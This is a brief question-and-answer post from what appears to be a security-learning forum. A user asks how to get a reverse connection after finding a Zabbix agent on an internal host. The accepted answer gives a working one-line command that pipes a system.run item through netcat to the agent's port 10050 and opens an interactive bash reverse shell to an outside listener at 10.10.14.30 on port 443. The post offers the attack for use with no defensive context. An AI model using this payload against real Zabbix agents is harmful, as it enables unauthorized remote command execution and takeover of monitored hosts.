Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

Need any help mail to [email protected]

0 votes

From netstat found a connection from a Zabbix agent on 172.17.0.1 to the Zabbix server port 10051. How can I back connect?

by (169 points)

1 Answer

0 votes
 
Best answer

Zabbix server can interact directly with the Zabbix agent on port 10050. So we can execute commands through the agent using system.run!

[zabbix_cmd]>>: echo "system.run[(/bin/bash -c 'bash -i >/dev/tcp/10.10.14.30/443 0<&1 2>&1 &')]" | nc 172.17.0.1 10050
by (269 points)
...